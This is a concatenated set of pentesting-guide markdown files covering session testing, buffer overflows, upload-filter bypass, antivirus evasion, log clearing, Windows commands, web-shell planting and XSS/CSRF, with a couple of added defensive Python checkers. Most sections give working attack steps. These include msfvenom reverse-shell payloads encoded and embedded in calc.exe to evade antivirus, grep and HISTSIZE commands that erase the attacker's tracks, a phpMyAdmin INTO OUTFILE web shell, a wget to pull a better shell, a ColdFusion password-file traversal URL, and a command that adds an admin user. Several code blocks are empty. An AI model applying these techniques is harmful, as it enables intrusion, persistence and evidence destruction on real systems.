Session IDs should never appear in URLs. If the session ID is passed in the URL and you share the link with someone, that person inherits your session; the ID also ends up in the browser history, in proxy and server logs, and in the Referer header of requests to other sites.
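The three checks above (HttpOnly, Secure, session ID in the URL) are easy to automate once you have the response headers in front of you in Burp. The following Python example is added here and is not part of the original notes: it parses `Set-Cookie` values with the standard library, reports missing flags, and flags query parameters whose names look like session identifiers. The list of session cookie names and the sample response are assumptions, constructed for the example.

```python
"""Audit Set-Cookie flags and session IDs in URLs.

Added example, not from the original notes. Paste the response headers you
see in Burp (as (name, value) pairs) and the URL that was requested; the
findings are the ones a session-management test is looking for.
"""
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlparse

# Names that usually carry a session identifier (assumed list, extend as needed).
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "sid"}


def audit_set_cookie(header_value: str) -> list:
    """Return findings for one Set-Cookie header value."""
    jar = SimpleCookie()
    jar.load(header_value)          # understands Path, Secure, HttpOnly, Expires, ...
    findings = []
    for name, morsel in jar.items():
        if not morsel["httponly"]:
            findings.append(f"{name}: no HttpOnly, readable via document.cookie (XSS can steal it)")
        if not morsel["secure"]:
            findings.append(f"{name}: no Secure, the browser also sends it over plain http://")
    return findings


def session_ids_in_url(url: str) -> list:
    """Return the query parameters whose name looks like a session identifier."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return [p for p in params if p.lower() in SESSION_COOKIE_NAMES]


def audit_response(url: str, headers: list) -> list:
    """Audit every Set-Cookie header of a response plus the URL it was requested with."""
    findings = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            findings.extend(audit_set_cookie(value))
    for param in session_ids_in_url(url):
        findings.append(f"{param}: session id passed in the URL (leaks via Referer, history, logs)")
    return findings


# Constructed response: one unprotected session cookie, one correctly flagged
# cookie, and the session id echoed into the URL.
SAMPLE_URL = "https://example.com/account?PHPSESSID=1a2b3c&tab=profile"
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "PHPSESSID=1a2b3c; Path=/"),
    ("Set-Cookie", "prefs=dark; Path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    for line in audit_response(SAMPLE_URL, SAMPLE_HEADERS):
        print(line)
```

The flags only say how the browser treats the cookie; whether the server still accepts the cookie after logout or a password reset (the issues in the sections that follow) has to be tested by replaying the request, for example with Burp Repeater.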
Keeping the session ID in a cookie avoids that.

### Password reset link does not expire

1. You create an account on example.com with the email a@email.com.
2. Your email account gets hacked.
3. The hacker figures out you have a user on example.com, requests a password reset link, but does not use it.
4. You notice that you have been hacked and go to example.com to change your password (or request a new reset link yourself).
5. The hacker now clicks on the old link and manages to reset the password.

The problem here is that the first reset link should be invalidated as soon as a second one is issued (and every link should be single-use and expire after a short time).

#### Relevant bug bounty reports

[https://hackerone.com/reports/23579](https://hackerone.com/reports/23579)
[https://hackerone.com/reports/39203](https://hackerone.com/reports/39203)
[https://hackerone.com/reports/23921](https://hackerone.com/reports/23921)

### Cookie does not expire

An easy way to test this is by using Burp Suite:

1. Open Burp Suite.
2. Log in to the website you want to test.
3. Intercept a request; any authenticated request will do.
4. Right-click on the request in Burp and choose "Send to Repeater". Now you have saved that request, with the current cookie, for later.
5. Log out from the website.
6. Go to the Repeater tab in Burp and click "Go".
7. Verify that you are redirected to the login page. If you get the authenticated page instead, the session is still alive on the server.

#### Relevant reports on hackerone

[https://hackerone.com/reports/18503](https://hackerone.com/reports/18503)

--------------------------------------------------------------------------------
/browser_vulnerabilities.md:
--------------------------------------------------------------------------------

# Browser vulnerabilities

So far we have mostly looked at vulnerabilities in websites that let us attack either the user or the underlying system.
But there is also another sort of vulnerability: when the browser itself is vulnerable, which can lead to remote code execution on the user's machine.

An example of this is ms12-036.

## XSS and redirection

Most attacks against browsers are based on social engineering. The idea is that you trick the user into clicking on a link. That link, or that website, is usually controlled by the attacker in one way or another. It can be a legitimate site that the attacker has compromised, or it might be the attacker's own server.

For example, if the attacker is able to inject HTML or JavaScript, the attacker can make the user's browser load another page.

One technique is to hide the redirection in a frame; this way the user won't even notice that an external page is being loaded.

```
```

A less subtle technique is to just redirect the user with a script like this:

```
```

--------------------------------------------------------------------------------
/buffer_overflow_bof.md:
--------------------------------------------------------------------------------

# Buffer overflow (BOF)

## Methodology

1. Investigate the file:

```
file binaryName
strings binaryName
```

2. Test it out: what does the program do?

3. Look at its functions in GDB:

```
info functions
```

4. Look at the assembly of a function:

```
disass main
disass otherfunction
```

5. Look for the flow of the program. Look for cmp and the conditional jumps that follow it.

6. Set up breakpoints, and a hook so that every stop shows the registers, the stack and the next instructions:

```
define hook-stop
info registers
x/24xw $esp
x/2i $eip
end
```

`info registers` shows the registers, `x/24xw $esp` dumps 24 words of the stack starting at the stack pointer, and `x/2i $eip` shows the next two instructions. For a 64-bit binary use `$rsp` and `$rip` instead.

7. Step through the whole program, or from breakpoint to breakpoint.
Or step from the breakpoints:

```
si   # step one instruction, following calls into functions
ni   # step one instruction, stepping over calls
```
-------------------------------------------------------------------------------- /bypass_image_upload.md: --------------------------------------------------------------------------------

# Bypass File Upload Filtering

One common way to gain a shell is actually not really a vulnerability, but a feature! Often it is possible to upload files to the webserver. This can be abused by just uploading a reverse shell. The ability to upload shells is often hindered by filters that try to filter out files that could potentially be malicious. So that is what we have to bypass.

## Rename it

We can rename our shell and upload it as shell.php.jpg. It passes the filter and the file is executed as PHP.

**php**
.phtml, .php, .php3, .php4, .php5, and .inc

**asp**
.asp, .aspx

**perl**
.pl, .pm, .cgi, .lib

**jsp**
.jsp, .jspx, .jsw, .jsv, and .jspf

**Coldfusion**
.cfm, .cfml, .cfc, .dbm

## GIF89a;

If they check the content.
Basically you just add the text "GIF89a;" before your shell-code. So it would look something like this:

```
GIF89a;
```

## In image

```
exiftool -Comment='"; system($_GET['cmd']); ?>' lo.jpg
```

Exiftool is a great tool to view and manipulate exif-data.
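For the defender's side of the three bypasses in this file (a second extension such as shell.php.jpg, the `GIF89a;` prefix, and a payload hidden in an EXIF comment), here is an upload validator that rejects all three, along with null-byte and `;` tricks in the filename. It is an added example, not code from this page or the Pentesting-Guide repository; `validate_upload`, `check_samples` and every sample input below are constructed for the demonstration.

```python
import os
import re
import secrets

# Extensions the web server may execute, taken from the lists in this file.
EXECUTABLE_EXTS = {
    "php", "phtml", "php3", "php4", "php5", "inc",
    "asp", "aspx",
    "pl", "pm", "cgi", "lib",
    "jsp", "jspx", "jsw", "jsv", "jspf",
    "cfm", "cfml", "cfc", "dbm",
}

# Allowed final extensions and the magic bytes a genuine file of that type starts with.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Script markers that never belong in an image; this catches both the
# "GIF89a;" prefix trick and a payload placed in an EXIF comment.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<%|<script", re.IGNORECASE)

MAX_BYTES = 5 * 1024 * 1024   # constructed limit for the example


class UploadRejected(ValueError):
    """Raised with a short reason when an upload must not be stored."""


def validate_upload(client_name, data):
    """Return a safe server-chosen filename, or raise UploadRejected with the reason."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    # A null byte or ';' in a name exists only to confuse a filter (shell.php\x00.jpg, shell.asp;.jpg).
    if "\x00" in client_name or ";" in client_name:
        raise UploadRejected("illegal character in filename")
    base = os.path.basename(client_name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("no extension")
    # Every dotted segment is checked, so shell.php.jpg is rejected, not only shell.php.
    if any(seg in EXECUTABLE_EXTS for seg in parts[1:]):
        raise UploadRejected("executable extension in filename")
    ext = parts[-1]
    if ext not in IMAGE_MAGIC:
        raise UploadRejected("extension not allowed")
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not match extension")
    if SCRIPT_MARKERS.search(data):
        raise UploadRejected("script markers in image data")
    # Never reuse the client's name: the server picks both the name and the extension.
    return secrets.token_hex(16) + "." + ext


def check_samples():
    """Run constructed samples through the validator; returns {label: "accepted" or reason}."""
    real_gif = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + bytes(16) + b";"
    samples = {
        "plain_gif": ("photo.gif", real_gif),
        "double_ext": ("shell.php.jpg", b"\xff\xd8\xff\xe0" + bytes(32)),
        "gif_prefix": ("shell.gif", b"GIF89a;\n<?php echo 'x'; ?>"),
        "exif_comment": ("lo.jpg", b"\xff\xd8\xff\xe1\x00\x20Exif\x00\x00" + b"<?php echo 1; ?>" + bytes(8)),
        "null_byte": ("shell.php\x00.jpg", real_gif),
        "semicolon": ("shell443.asp;.jpg", real_gif),
        "mismatch": ("notes.png", b"GIF89a" + bytes(16)),
    }
    results = {}
    for label, (name, data) in samples.items():
        try:
            validate_upload(name, data)
            results[label] = "accepted"
        except UploadRejected as reason:
            results[label] = str(reason)
    return results
```

The marker scan is a cheap secondary check; the stronger fix, not shown here, is to re-encode every accepted image with an image library and discard the original bytes, which also strips EXIF data. What actually prevents execution is the last line: the stored file gets a random server-chosen name with an allow-listed extension, so whatever the client called it never reaches the web server's handler mapping.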
Then I had to rename the file

```
mv lo.jpg lo.php.jpg
```

## Nullbyte

## References

http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html

https://www.owasp.org/index.php/Unrestricted_File_Upload
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Webshells%20In%20PHP,%20ASP,%20JSP,%20Perl,%20And%20ColdFusion.pdf
-------------------------------------------------------------------------------- /bypassing_antivirus.md: --------------------------------------------------------------------------------

# Bypassing antivirus

So first of all, what is an antivirus program and how does it work?

## How does it work?

Antivirus products normally use blacklisting as their methodology. They have a huge database full of signatures for different known malware. The antivirus then scans the disk and searches for any of those signatures.

## How do we bypass it?

Since there are many different antivirus products and they all have different signature databases, it is important for us to know which antivirus our target uses. Once we know that we can use virustotal.com to upload our malicious files to see if that specific antivirus finds it.

So what we need to do is to change the malware enough that the signature changes and the antivirus is not able to identify the file as malicious.

There are a few different techniques for doing this.

### Encoding

We can encode our malware in different ways. This can be done with msfvenom. Notice how we set the `-e` flag here, and then use the `shikata_ga_nai` encoder. This is not that effective since antivirus vendors have access to Metasploit as well.
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e x86/shikata_ga_nai -i 9 -o meterpreter_encoded.exe
```

### Embed in non-malicious file

Another way is to embed our payload in a non-malicious file.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e x86/shikata_ga_nai -i 9 -x calc.exe -o bad_calc.exe
```

### Encrypting the malware

In order to obfuscate our malware we can encrypt it, and thus radically change the signature. One much-mentioned tool for doing that is Hyperion. It is a Windows binary but we can compile and run it from Linux as well. This worked for me (October 2016):

```
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip
unzip Hyperion-1.2.zip
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe
```

In Kali you have Hyperion 1 included. However, for it to work you have to run it from its correct path. So go to `/usr/share/veil-evasion/tools/hyperion`

And run it like this:

```
wine hyperion /path/to/file.exe encryptedfile.exe
```

-------------------------------------------------------------------------------- /clean_up.md: --------------------------------------------------------------------------------

# Cover your tracks

http://www.dankalia.com/tutor/01005/0100501003.htm

## On Linux

### Log files

`/etc/syslog.conf`

In this file you can read which logs syslog writes, and where.

On Linux systems a lot of logs are stored in:

```
/var/log
```

For example:

```
/var/log/messages
```

Here you have failed and successful login attempts, SSH, sudo, and much more.
```
/var/log/auth.log
```

### Apache

```
/var/log/apache2/access.log
/var/log/apache2/error.log
```

Remove your own IP like this:

```
grep -v '' /path/to/access_log > a && mv a /path/to/access_log
```

What it does is simply copy all lines except the lines that contain your IP address to a new file, and then move that file back over the original.

```
grep -v > /tmp/a ; mv /tmp/a ; rm -f /tmp/a
```

### UTMP and WTMP

These logs are not stored in plaintext but as binaries, which makes them a bit harder to clear.

```
who
```

```
last
```

```
lastlog
```

### Command history

All your commands are also stored.

```
echo $HISTFILE
echo $HISTSIZE
```

You can set the history size to zero like this, to avoid storing commands:

```
export HISTSIZE=0
```

If you set it as soon as you get a shell you won't have to worry about cleaning up the history.

## Shred files

Shredding files lets you remove files in a more secure way.
```
shred -zu filename
```

## On windows

Clear the event logs:
https://www.offensive-security.com/metasploit-unleashed/event-log-management/
-------------------------------------------------------------------------------- /clickjacking.md: --------------------------------------------------------------------------------

# Clickjacking

# References

HackerOne issues
https://hackerone.com/reports/109373
-------------------------------------------------------------------------------- /cmd.md: --------------------------------------------------------------------------------

# CMD - Windows commands

The equivalent of the Linux command separator `;`, as in

```
echo "command 1" ; echo "command 2"
```

is `&`:

```
dir & whoami
```

### Dealing with files and stuff

**Delete file**

```
del
```

**Create folder/directory**

```
md folderName
```

**Show hidden files**

```
dir /A
```

**Print out file content, like cat**

```
type file.txt
```

**grep files**

```
findstr file.txt
```

### Network

**Show network information**

`netstat -an`

**Show network adapter info**

`ipconfig`

**Ping another machine**

`ping 192.168.1.101`

**Traceroute**

`tracert`

### Processes

**List processes**

`tasklist`

**Kill a process**

`taskkill /PID 1532 /F`

### Users

```
net users

# Add user
net user hacker my_password /add
net localgroup Administrator hacker /add

# Check if you are part of a domain
net localgroup /domain

# List all users in a domain
net users /domain
```

### Other

**Shutdown**

```
# Shutdown now
shutdown /s /t 0

# Restart
shutdown /r /t 0
```

**cipher - Clear data/shred**

```
# Overwrites the free space on the whole C: drive
cipher /w:C:\
```

**Show environment variables**

```
set
```

**Show options for commands**

The "man"-pages in Windows are simply:

```
help dir
```

### Mounting - Mapping

In the Windows world mounting is called mapping.

If you want to see which drives are mapped/mounted to your file-system you can use any of these commands:

```
# This is the most thorough
wmic logicaldisk get deviceid, volumename, description

# But this works too
wmic logicaldisk get name
wmic logicaldisk get caption

# This can be slow. So don't kill your shell!
fsutil fsinfo drives

# With powershell
get-psdrive -psprovider filesystem

# This works too, but it is interactive, so it can hang a limited shell
diskpart
list volume

# List only network drives
net use
```

The command to deal with mounting/mapping is **net use**.

Using `net use` we can connect to shared folders on other systems. Many Windows machines have a default share called IPC$ (Interprocess communication share). It does not contain any files, but we can usually connect to it without authentication. This is called a **null-session**. Although the share does not contain any files, it exposes a lot of data that is useful for enumeration.
The Linux equivalent of `net use` is usually `smbclient`.
```
net use \\IP address\IPC$ "" /u:""
net use \\192.168.1.101\IPC$ "" /u:""
```

If you want to map a drive from another machine on the network to your filesystem you can do that like this:

```
# This will map it to drive z
net use z: \\192.168.1.101\SYSVOL

# This will map it to the first available drive-letter
net use * \\192.168.1.101\SYSVOL
```

Here you map the drive to the letter `z`. If the command is successful you should now be able to access those files by entering the `z` drive.

You enter the z-drive by doing this:

```
C:\>z:
Z:\

# Now we switch back to c
Z:\>c:
C:\
```

**Remove a network drive - unmount it**

First leave the drive if you are in it:

```
c:
net use z: /del
```

# References and Stuff

This might come in handy for the Linux users: http://www.lemoda.net/windows/windows2unix/windows2unix.html

-------------------------------------------------------------------------------- /commands.md: --------------------------------------------------------------------------------

# Commands

You can find all the commands for Metasploit here:

https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

I just want to highlight some really useful commands.

## setg

With `setg` you can set global variables. Instead of having to enter `set LHOST 192.168.1.101` for every payload and listener, with `setg` those will be automatically filled in with your global values. You can enter `save` to save the global values so they persist from one session to the next.

## Populate RHOSTS from database

This is an incredibly useful feature.

First you choose the auxiliary module.
Then you just do

```
services -p 139 --rhosts
run
```
-------------------------------------------------------------------------------- /common_web-services.md: --------------------------------------------------------------------------------

# Common web-services

This is a list of some common web-services. The list is alphabetical.

## Cold Fusion

If you have found a ColdFusion install you have almost certainly struck gold.
http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers

### Determine version

example.com/CFIDE/adminapi/base.cfc?wsdl

It will say something like:

```

```

### Version 8

#### FCKEDITOR

This works for version 8.0.1. So make sure to check the exact version.

```
use exploit/windows/http/coldfusion_fckeditor
```

#### LFI

This will output the hash of the password.

```
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```

You can pass the hash.

http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers

http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

neo-security.xml and password.properties

## Drupal

## Elastix

Full of vulnerabilities, the old versions at least.

http://example.com/vtigercrm/
The default login is
`admin:admin`

You might be able to upload a shell as the profile photo.

## Joomla

## Phpmyadmin

Default credentials

```
root
pma
```

If you find a phpMyAdmin part of a site that does not have any authentication, or you have managed to bypass the authentication, you can use it to upload a shell.
You go to:

```
http://192.168.1.101/phpmyadmin/
```

Then click on SQL.

```
Run SQL query/queries on server "localhost":
```

From here we can just run an SQL query that creates a PHP script that works as a shell.

So we add the following query:

```
SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"

# For linux
SELECT "" into outfile "/var/www/html/shell.php"
```

The query is pretty self-explanatory. Now you just visit `192.168.1.101/shell.php?cmd=ipconfig` and you have a working web-shell.
We can of course just write a super long query with a better shell. But sometimes it is easier to just upload a simple web-shell, and from there download a better shell.

### Download a better shell

On Linux machines we can use wget to download a more powerful shell.

```
?cmd=wget%20192.168.1.102/shell.php
```

On Windows machines we can use tftp.

## Webdav

Okay, so WebDAV is old as hell, and not used very often. It is pretty much like FTP, but you go through HTTP to access it. So if you have WebDAV installed on a XAMPP server you can access it like this:

```
cadaver 192.168.1.101/webdav
```

Then sign in with username and password.
The default username and password on XAMPP are:

Username: **wampp**

Password: **xampp**

Then use **put** and **get** to upload and download. With this you can of course upload a shell that gives you better access.

If you are looking for live examples just google this:

```
inurl:webdav site:com
```

Test if it is possible to upload and execute files with WebDAV.
```
davtest -url http://192.168.1.101 -directory demo_dir -rand aaaa_upfileP0C
```

If you managed to gain access but are unable to execute code there is a workaround for that!
So if WebDAV has prohibited the user from uploading .asp code, .pl and whatever, we can do this:

Upload a file called shell443.txt, which of course is your .asp shell. Then you rename it to **shell443.asp;.jpg**. Now you visit the page in the browser and the ASP code will run and return your shell.

### References

http://secureyes.net/nw/assets/Bypassing-IIS-6-Access-Restrictions.pdf

## Webmin

Webmin is a web GUI to interact with the machine.

The password to enter is the same as the password for the root user, and other users if they have that right. There are several vulnerabilities for it. It runs on port 10000.

## Wordpress

```
sudo wpscan -u http://cybear32c.lab
```

If you hit a 403, that is, the request is forbidden for some reason.
Read more here: https://en.wikipedia.org/wiki/HTTP_403

It could mean that the server is suspicious because you don't have a proper user-agent in your request; in wpscan you can solve this by adding `--random-agent`.
You can of course also define a specific agent if you want that. But random-agent is pretty convenient.

```
sudo wpscan -u http://cybear32c.lab/ --random-agent
```

### Scan for users

You can use wpscan to enumerate users:
-------------------------------------------------------------------------------- /compiling-windows-exploits.md: --------------------------------------------------------------------------------

Compiling exploits for Windows on Linux can be a bit of a hassle.
```
i686-w64-mingw32-gcc exploit.c -o exploit
```

For 32bit

```
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32
```

-------------------------------------------------------------------------------- /connections.md: --------------------------------------------------------------------------------

# Useful Scripts

## Make Request

Sometimes we might want to make a request to a website programmatically, instead of having to visit the page in the browser. In Python we can do it the following way.

If you don't have the module requests installed you can install it like this.

`pip install requests`

```python
import requests

req = requests.get("http://site.com")
print req.status_code
print req.text
```

### Custom headers

We might receive a `403` error if we don't include a user-agent. Or we might want to send a specific header. We can do that the following way.
```python
import requests

headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, sdch",
    "Accept-Language": "en-US,en;q=0.8,es;q=0.6,sv;q=0.4",
    "Cache-Control": "max-age=0",
    "Connection": "keep-alive",
    "Cookie": "_gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1",
    "Host": "docs.python-requests.org",
    "If-Modified-Since": "Wed, 03 Aug 2016 20:05:34 GMT",
    "If-None-Match": 'W/"57a24e8e-e1f3"',
    "Referer": "https://www.google.com/",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36"
}

req = requests.get("http://site.com", headers=headers)
print req.status_code
print req.text
```

If you need to add an action, like logging in or something like that, to your request you do the following:

```python
# Form data goes in the request body, so this is a POST rather than a GET.
values = {'action' : 'whatever'}
req = requests.post("http://site.com", data=values, headers=headers)
```

Here is the documentation:
http://docs.python-requests.org/en/master/user/quickstart/

## Read and write to files

Many times we want to read through files and do stuff with them. This can of course be done using bash, but we can also do it in Python. It might be easier to parse text in Python.

```python
file_open = open("readme.txt", "r")
for line in file_open:
    print line.strip("\n")
    if line.strip("\n") == "rad 4":
        print "last line"
```

## Basic banner-grabber

Here is an example of the most basic usage of the socket module. It connects to a port and prints out the response.
```python
#!/usr/bin/env python

# Importing the socket module
import socket

# We use the socket() method of the module socket and store it in the variable s.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Here we use the connect method of the socket we created. The two arguments are pretty self-explanatory:
# the first is the address, the second is the port.
s.connect(("192.168.1.104", 22))

# Here we save what the socket received in the variable answer.
answer = s.recv(1024)
print answer

# Send stuff. REMEMBER THE \r\n
s.send("this is my message\r\n")
print s.recv(1024)

# Here we close the socket (the parentheses matter: s.close without them does nothing).
s.close()
```

If you need to check all 65535 ports this might take some time. If sending and receiving a packet takes one second per port, that makes 65535 seconds, which translates into about 18 hours. So to solve that we can run the function in new threads.

```python
from multiprocessing.dummy import Pool as ThreadPool
pool = ThreadPool(300)
results = pool.map(function, array)
```

Read more about parallelism here: http://chriskiehl.com/article/parallelism-in-one-line/

## Connecting to SMTP

A crappy script to connect to an SMTP server; if you are allowed to test for users with VRFY it goes ahead and tests the users that you input from a file.
One very important thing to note here, that had me stuck for quite a while, is that you need to send the query strings in raw format.

The `\r` here is fundamental!!
```
s.send('VRFY root \r\n')
```

```python
#!/usr/bin/python
import socket
import sys
import time
import re

ips = [
    "192.168.1.22",
    "192.168.1.72"
]

users = ["root"]

userfile = open("/fileWithUsernames.txt", "r")
for line in userfile:
    user = line.strip("\n")
    users.append(user)


for ip in ips:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 25))
    banner = s.recv(1024)

    print "****************************"
    print "Report for " + ip
    print banner
    s.send('VRFY root \r\n')
    answerUsername = s.recv(1024)
    answerAsArray = answerUsername.split(" ")

    if answerAsArray[0] == "502":
        print "VRFY failed"
    elif answerAsArray[0] == "250":
        print "VRFY command succeeded.\nProceeding to test usernames"

        for username in users:
            time.sleep(5)
            s.send("VRFY " + username + "\r\n")

            answerUsername = s.recv(1024)
            answerUsernameArray = answerUsername.split(" ")
            print answerUsernameArray[0]
            if answerUsernameArray[0] == "250":
                print "Exists: " + username.strip("\n")
            else:
                print "Does NOT exist: " + username.strip("\n")
    elif answerAsArray[0] == "252":
        print "FAILED - Cannot verify user"
    else:
        # Without print this string would just be evaluated and discarded.
        print "Some other error or whatever here it is: \n" + answerUsername

    s.close()
```

## Client/Server using sockets

http://programmers.stackexchange.com/questions/171734/difference-between-a-socket-and-a-port
-------------------------------------------------------------------------------- /create_shellcode.md: --------------------------------------------------------------------------------

# Generate shellcode

An easy way to generate shellcode is by using `msfvenom` or `msfconsole`.
I mostly see people recommending msfvenom online, but I think msfconsole can be a bit easier to work with. But of course it is the same thing, just different interfaces.

## Msfconsole

In msfconsole you have the command `generate` that helps us generate shellcode. So first we have to select a payload.

```
use payload/windows/shell_reverse_tcp
```

Now we set the variables as usual:

```
set LPORT 5555
set LHOST 192.168.0.101
```

Now we generate the shellcode using the command `generate`.

To see the options use `generate -h`

## Single commands in windows

If you don't have space and only want to execute a single command you can use

```
use payload/windows/exec

use payload/cmd/windows/generic
```

-------------------------------------------------------------------------------- /creating_malicious_files.md: --------------------------------------------------------------------------------

# Creating malicious files

Not all exploits in msf connect to your target. Sometimes Metasploit can create the exploit and then you need to get the target to click on it.

This of course usually requires your target to have some vulnerability.

If your target for example uses an old version of Adobe Acrobat we can create an exploit for that.

```
use exploit/windows/fileformat/adobe_utilprintf

show options

set payload windows/meterpreter/reverse_tcp
exploit
```

So what we are doing here is first select the exploit, then we select what payload we want to have in that exploit. In this case we chose a reverse_tcp shell.

Now we need to set up a handler to receive the connect-back.
```
use exploit/multi/handler
set LHOST 192.168.1.102
set LPORT 4444
exploit
```

There, now we are up and listening for the connect-back when the user clicks on the file.
We can look at the advanced options to make sure that the listener does not exit when you receive a connect-back, so that you can keep listening for more connect-backs.

-------------------------------------------------------------------------------- /cross-site-scripting.md: --------------------------------------------------------------------------------

# Cross-site-scripting

Cross-site-scripting, or XSS as it is sometimes abbreviated to, is an attack that lets the attacker execute JavaScript code in the browser of the victim.

## So, what's the worst that can happen?

The attacker is probably not that interested in changing the color or font of the website the victim is visiting, although s/he could do that. The worst that can happen is probably the following:

1. Complete control over the browser
The attacker can access plugins, like password managers. The attacker can trick the user into allowing webcam or audio.

2. Session-hijacking/Cookie theft
This is when the attacker steals the cookie that is saved in the browser. Using this cookie the attacker can log in to the service as the victim, and thereby gain access to his/her account. If the victim is an admin that has extended privileges (uploading code, images, or whatever) this could lead to a compromise of the server itself.

3. Keylogger
The attacker can execute a keylogging script that steals everything the user inputs on the website. This could be used to steal sensitive information, like passwords, credit card information, chat logs or whatever the user inputs.

4. Phishing
The attacker can insert a fake login.
Imagine that you visit a site, and from that site you are able to log in using your Facebook or Google account. The attacker could spoof that so that when you enter your credentials, they are sent to the attacker instead.

5. Browser exploits
The script can redirect to another page that issues an attack against the browser, possibly leading to total takeover of the machine.

### Types of XSS

1. Persistent
This is when the malicious code originates from the website's database. That means the attacker has managed to insert malicious code into the database, so every time the database serves that data the script will be executed. This is probably the most dangerous XSS, since it does not need to rely on social engineering.

2. Reflected
This is an attack where the script originates from the user's request. This might seem a bit illogical: why would a user inject malicious code to himself? Well the code can

3. DOM based
DOM-based attacks are when something is injected into JavaScript on the DOM. So, it does not go by the server, because the code gets executed in the response.
Take a search functionality for example. The user enters a search parameter that gets sent to the server, which might sanitize it. In the response the found search items are sent, but not the search query. But on the webpage the search query is exposed: "You searched for X" is shown. That is because it gets the search parameter from the URL parameter, by using `document.location.href` for example.

## Beef

Beef username/password: beef:beef
Beef is a great tool for attacking browsers.

After starting it up you can log in to the panel. Then you get someone to execute the hook.
Hook URL: http://172.17.15.118:3000/hook.js
UI URL: http://172.17.15.118:3000/ui/panel

By injecting the hook into an XSS.
Like this:

```javascript

```

### How does it really work?

Let's look at a practical example.

### Protect yourself

The problem with XSS is that it is a bit hard for the users to protect themselves. If there is a problem with the website there is not that much the user can do.

One can always use NoScript to block all JavaScript code. But that pretty much destroys the whole experience of using the internet.

### Protect your website

There are mainly two ways to protect against XSS: **encoding** and **sanitizing**.

#### Encoding

Of course the way to protect your website is to sanitize all input.

You can also set the response header like this:
`X-XSS-Protection: 1; mode=block`

For Node.js you can use the helmet module to do this.
https://www.npmjs.com/package/helmet

### Risks for the attacker

The obvious risk is that the attacker must expose a server.

### Tools

#### XSSER

This tool tests a lot of

`xsser --gtk`

#### Xssposed

This is a tool found in recon-ng. It basically just checks this database (https://www.openbugbounty.org/) to see if anyone has reported an XSS for the website.

### References:

http://brutelogic.com.br/blog/probing-to-find-xss/
http://excess-xss.com/

-------------------------------------------------------------------------------- /cross_site_request_forgery.md: --------------------------------------------------------------------------------

# Cross Site Request Forgery

Cross Site Request Forgery (CSRF) attacks force the user to perform an action he did not intend to perform. This is usually (only?) possible by creating a malicious URL that the victim executes in his browser while he is logged in.

## What's the worst that can happen?
The attacker can make actions for the user, for example change the email address, make a purchase, or something like that. So it could be used to change the address and then reset the password by sending an email.

## How to perform it?

1. Investigate how the website works
First you need to know how the application works. What the endpoints are.

2. Construct your malicious URL
Now you just construct the URL, either using GET or POST.

- `GET`
If you use only `GET` you can construct the URL like this:

http://example.com/api/createUser?name=Jose

- `POST`

If the requests are sent as `POST` you need to make the victim run a link to a server you control, so that you can add the arguments in the body.

There is one great trick for this. It is to use the image tag, because the image tag can be used to automatically retrieve information from other sites. If you have an image on your site but it is referenced to

``

## Protection

The only real solution is to use unique tokens for each request.

### References

http://tipstrickshack.blogspot.cl/2012/10/how-to-exploit-csfr-vulnerabilitycsrf.html

https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
-------------------------------------------------------------------------------- /dGaQO6Y.png: --------------------------------------------------------------------------------

https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/dGaQO6Y.png
-------------------------------------------------------------------------------- /database.md: --------------------------------------------------------------------------------

# Database

Working with the database that is connected to Metasploit is great.

```
workspace
workspace -a nameOfNewWorkspace #Add
workspace -d nameOfNewWorkspace #Delete
```


```
hosts
```

```
services
```
--------------------------------------------------------------------------------
/default_layout_apache_on_different_versiont.md:
--------------------------------------------------------------------------------
# Default Layout of Apache on Different Versions


Really useful if you want to know what the root folder is for an Apache install:

https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29:
--------------------------------------------------------------------------------
/dictionary_attacks.md:
--------------------------------------------------------------------------------
# Dictionary Attacks

## Burp suite
Intercept the login request
Right-click - Send to Intruder

--------------------------------------------------------------------------------
/directory-traversal-attack.md:
--------------------------------------------------------------------------------
